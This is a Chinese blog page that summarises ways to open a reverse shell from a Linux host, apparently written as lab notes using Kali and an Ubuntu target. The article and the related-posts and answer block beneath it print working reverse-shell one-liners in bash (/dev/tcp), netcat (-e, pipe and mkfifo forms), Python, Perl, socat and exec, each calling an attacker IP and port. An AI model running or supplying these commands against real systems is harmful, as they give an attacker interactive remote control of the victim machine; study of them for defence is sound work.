Linux反弹shell方式总结

最新推荐文章于 2025-06-12 20:18:06 发布
最新推荐文章于 2025-06-12 20:18:06 发布
阅读量1.3k 收藏 8
点赞数
CC 4.0 BY-SA版权
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43936524/article/details/111003949
本文介绍如何通过bash、netcat及Python实现在目标系统上反弹Shell。包括基础知识、指令分析及具体操作步骤,帮助读者掌握不同场景下的反弹Shell技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

bash反弹

反弹指令:
bash -i >& /dev/tcp/ip/port 0>&1
反弹步骤:
在kail上开启7777侦听:
nc -lvp 7777
在靶机上输入反弹指令即可反弹成功

基础知识

linux下有三个标准的文件描述符:
0 - stdin 代表标准输入,使用<或<<
1 - stdout 代表标准输出,使用>或>>
2 - stderr 代表标准错误输出,使用2>或2>>

>&代表重定向
当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。
当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符

指令分析

  1. bash -i表示本地打开一个bash
  2. /dec/tcp时linux系统一个特殊的设备,打开这个文件后会自动建立一个socket以连接对应IP的端口。而>&后面加上这个远端连接就等于将本地的标准输出标准错误输出重定向到远端的连接。假如连接的IP对应端口处于listening状态,在靶机输入指令结果就会在kail上显示。

在kail上开启监听 7777端口
在这里插入图片描述
ubuntu上打开一个bash并将标准输出和错误重定位到kail的连接上。
在这里插入图片描述
此时在ubuntu上输入ls,发现已经指令和结果已经显示到kail上。
在这里插入图片描述
因为没有将标准输入重定向到kail中故在kail中输入指令无法得到结果。
在这里插入图片描述

  1. 而0>&1则代表将标准输入重定向到标准输出,由2.可知标准输出已经重定向到远程,故可在远端输入指令,同时在远端显示指令输出的内容。
    输入bash -i >& /dev/tcp/ip/port 0>&1将输入流重定位后,kail可输入指令并返回结果。
    在这里插入图片描述
    0>&2的效果也相同,因为标准错误输出也已经重定位到了kail上。

netcat反弹

nc反弹shell的前提条件是靶机上需要支持nc命令,且根据nc版本的不同反弹的指令也略有差异。

nc -e反弹

假如nc上有 -e 命令,可用nc -h查看
反弹指令:nc -e /bin/bash 192.168.169.128 7777
反弹指令的意思是nc建立连接后可以执行-e后面的文件/bin/bash即可以执行shell指令。
在这里插入图片描述

使用管道符反弹

假如nc不支持 -e 指令就要使用linux的管道符来帮助反弹shell

管道符 | 可理解为管道符前的输出经过管道符传输给了管道符后当作输入。

在kail上开启7777和8888的端口。
在ubuntu输入反弹指令:nc 192.168.169.128 7777|/bin/bash|192.168.169.128 8888

在这里插入图片描述
在这里插入图片描述
此时在7777监听端口输入的指令会传到ubuntu中被/bin/bash执行,输出的结果又会传到8888监听端口中显示
在这里插入图片描述

python反弹

在kail上开启7777端口监听
反弹指令:

python3 -c "import os,socket,subprocess;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(('192.168.169.128',7777));
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
p=subprocess.call(['/bin/bash','-i'])"

在这里插入图片描述
在这里插入图片描述

指令分析

# 导入所需要的os,socket,subprocess包
"import os,socket,subprocess;
# 创建一个tcp套接字
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
# 与目标ip 端口号建立tcp连接
s.connect(('192.168.169.128',7777));
# os.dup2() 方法用于将一个文件描述符 fd 复制到另一个 fd2。
# 分别将标准输入,标准输出,标准错误输出重定向到远端的连接
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
# 打开一个子进程以-i 交互的方式执行
p=subprocess.call(['/bin/bash','-i'])"

未完待续…

kit_1
关注
反弹shell总结
weixin_51692662的博客
11-10 1206
反弹shell
Linux之bash反弹shell原理浅析
热门推荐
Au
04-07 1万+
环境 攻击机:kali ip:192.168.25.144 靶 机:centos ip:192.168.25.142 过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp/192.168.25.144/8888 0>&1 ...
ncat反弹shell,正反向连接(安全笔记)
最新发布
qq_46633423的博客
06-12 1051
2、windows没有自带的nc。3、想办法上传nc 反弹权限。1、判断windows。
【安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6679
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
反弹shell学习(一):基础反弹姿势
E1even的博客
07-25 2299
文章目录bash反弹nc反弹-e被阉割的情况:nc -e:利用Telnet反弹shell方法1:方法2:python脚本反弹:PHP反弹shell总结: bash反弹: 这是最常见也是最简单的一种反弹shell方式,直接看命令: 攻击机:nc -lvp 2333 受害机:bash -i >& /dev/tcp/192.168.28.133/2333 0>&1 攻击机: 受害机: 最后攻击机达成的效果: 可以命令执行,再实际中不可能获取的是root权限,所以成功反弹s
图文介绍——NC使用笔记
LainWith的博客
01-20 8354
NC 简介 Netcat 简称为nc,中文名网猫,被誉为网络工具中的瑞士军刀。具备以下功能: 侦听模式/传输模式 telnet/获取 banner信息(当作telent工具使用,甚至更好用) 传输文本信息(可以作为聊天工具) 传输文件/目录 加密传输文件 远程控制/木马(一般来说,不会被查杀) 加密所有流量 流媒体服务器 远程克隆硬盘(一般用作电子取证) nc 有很多变种。不同的变种,会在原有 nc 的基础上增加一些新功能。比较流行的变种之一是OpenBSD 社区的变种(也叫“OpenBSD netc
nc不支持-e时的反弹
神棍之路
12-28 786
【代码】nc不支持-e时的反弹
Linux反弹Shell的多种技巧
安心写bug的博客
08-10 1310
反弹Shell(Reverse Shell)主要用来实现反向连接,突破防火墙限制、权限不足、端口限制、动态IP、内网NAT等情况,这些限制使得传统的正向连接(如SSH、Telnet等)难以实现。
linux反弹shell的原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shellnc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
Linux反弹Shell总结
qq_45600801的博客
01-06 4439
反弹姿势 1、NC正向反弹 靶机: nc -lvvp 靶机端口 -e /bin/sh 攻击机: nc 靶机ip 靶机端口 2、NC反向反弹 (1)、可使用-e参数: 靶机: nc x.x.x.x 8888 -e /bin/bash 攻击机: nc -lvvp 8888 (2)、NC,无-e参数反弹shell 有些版本的NC可能不支持-e选项,不能使用-e,则: 方法一: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc
linux反弹shell检测和溯源,Wazuh联动osquery检测linux反弹shell
weixin_39820136的博客
05-14 1264
用osquery根据制定的规则定时检测系统并生成包含查询结果的日志文件,wazuh再对这些日志文件进行解析之后匹配规则告警。osquery下载安装的过程就略过了。这里简单介绍下osquery,详细请参考官方文档文件结构/etc/osquery//usr/share/osquery/osquery.example.conf/usr/share/osquery/lenses/{*}.aug/usr/s...
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 3310
详细讲解Linux反弹shell包含的NC正向shellNC反向shell,bash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
强大的nc命令(英文说明)!
A coder of life
01-20 1997
在命令行输入命令:man ncnc -h即可查看nc命令的使用说明,前者更为详细,虽说是英文,但用法不难看懂。如下: NAME      nc - arbitrary TCP and UDP connections and listens SYNOPSIS      nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
.sh文件中第一行 #!/bin/bash -il 是什么
~
05-10 2494
非登录 shell 是指在已经登录的 shell 环境中再次打开一个 shell 环境,这个 shell 进程就是非登录 shell,它不会读取。非交互式则是指在 shell 环境中执行一条或多条命令,不需要用户输入。登录 shell 是指当你第一次登录系统时,系统会为你分配一个 shell 进程,这个 shell 进程就是登录 shell,它会读取。实际上是一个 shell 内置的变量,它表示当前用户的 home 目录,可以通过。在 Bash 中,有两种运行方式:登录 shell 和非登录 shell
linuxnc命令(netcat)详解
sozee910的博客
09-07 1710
nc(netcat)是一个功能强大的网络工具,可以进行端口扫描、传输文件、监听端口等多种网络操作。它的命令参数可以帮助用户执行各种任务。
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4974
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nclinuxshell: nc -e /bin/bash 1.1.1.1 99992. 如果linuxnc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
#!/bin/sh简介
u014044624的博客
02-26 7346
openwrt
Linux反弹shell命令语句解析
Lee_Natuo的博客
12-07 968
Linux反弹shell命令语句 语句格式 bash -i &amp;amp;gt;&amp;amp;amp; /dev/tcp/[ip]/[port] 0&amp;amp;gt;&amp;amp;amp;1 bash -i 打开bash &amp;amp;amp;后面跟 /dev/tcp/[ip]/[port] (相当于&amp;amp;gt;&amp;amp;amp;后面接文件)将bash的标准输出和标准错误输出传递到远
Linux反弹 shell 命令解析
守拙的博客
08-29 707
Linux 反弹 shell 命令 bash -i > /dev/tcp/192.168.139.149/4444 0>&1 各部分代表的意思。
linux 反弹shelllinux
06-08
### 实现反弹Shell的多种方法 在Linux系统中,可以从目标主机发起反弹Shell连接到另一台Linux设备。以下是几种常见的实现方式: #### 1. 使用 `bash` 发起反弹Shell 通过 `bash` 的 `/dev/tcp` 功能可以轻松实现反弹Shell。命令如下: ```bash bash -i >& /dev/tcp/目标IP/端口 0>&1 ``` 例如,如果目标Linux主机的IP地址为 `192.168.1.100`,端口为 `4444`,则命令为: ```bash bash -i >& /dev/tcp/192.168.1.100/4444 0>&1 ``` 这会将当前主机的Shell反弹到目标Linux主机上[^2]。 #### 2. 使用 `nc`(Netcat)实现反弹Shell `nc` 是一种强大的网络工具,可以通过它实现反弹Shell。目标主机需要监听指定端口。命令如下: ```bash nc -e /bin/bash 目标IP 端口 ``` 例如: ```bash nc -e /bin/bash 192.168.1.100 4444 ``` 需要注意的是,某些系统可能禁用了 `-e` 参数,此时可以使用以下替代方案: ```bash rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash 2>&1 | nc 目标IP 端口 > /tmp/f ``` 例如: ```bash rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash 2>&1 | nc 192.168.1.100 4444 > /tmp/f ``` 这种方式适用于无法直接使用 `-e` 参数的情况[^5]。 #### 3. 使用 `perl` 脚本实现反弹Shell Perl 脚本也可以用于实现反弹Shell。示例代码如下: ```perl use Socket; $IP = "目标IP"; $PORT = 端口; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")); connect(SOCKET, sockaddr_in($PORT, inet_aton($IP))); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); exec("/bin/bash") or exec("/bin/sh"); ``` 例如,如果目标IP为 `192.168.1.100`,端口为 `4444`,则脚本中的 `$IP` 和 `$PORT` 需要相应设置[^1]。 #### 4. 使用 `python` 实现反弹Shell Python 提供了简洁的反弹Shell实现方式。示例代码如下: ```python import socket, subprocess, os s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("目标IP", 端口)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) subprocess.call(["/bin/bash", "-i"]) ``` 例如,如果目标IP为 `192.168.1.100`,端口为 `4444`,则需要替换 `"目标IP"` 和 `端口` 的值[^3]。 #### 5. 使用 `socat` 实现反弹Shell `socat` 是一种功能强大的双向通信工具,可以用来实现反弹Shell。命令如下: ```bash socat exec:"bash -li",pty,stderr,setsid,sigint,sane tcp:目标IP:端口 ``` 例如: ```bash socat exec:"bash -li",pty,stderr,setsid,sigint,sane tcp:192.168.1.100:4444 ``` 这种方式适用于支持 `socat` 的环境[^3]。 #### 6. 使用 `exec` 和重定向实现反弹Shell 通过文件描述符和重定向,可以实现更复杂的反弹Shell。示例命令如下: ```bash exec 5<>/dev/tcp/目标IP/端口; cat <&5 | while read line; do $line 2>&5 >&5; done ``` 例如: ```bash exec 5<>/dev/tcp/192.168.1.100/4444; cat <&5 | while read line; do $line 2>&5 >&5; done ``` 这种方式适用于受限环境中[^4]。 ### 注意事项 - 在目标Linux主机上需要确保目标端口已开启监听。例如,使用以下命令监听端口: ```bash nc -nvlp 端口 ``` - 确保目标主机和攻击机之间的网络是连通的。 - 不同的Linux发行版可能对某些工具的支持程度不同,请根据实际情况选择合适的工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值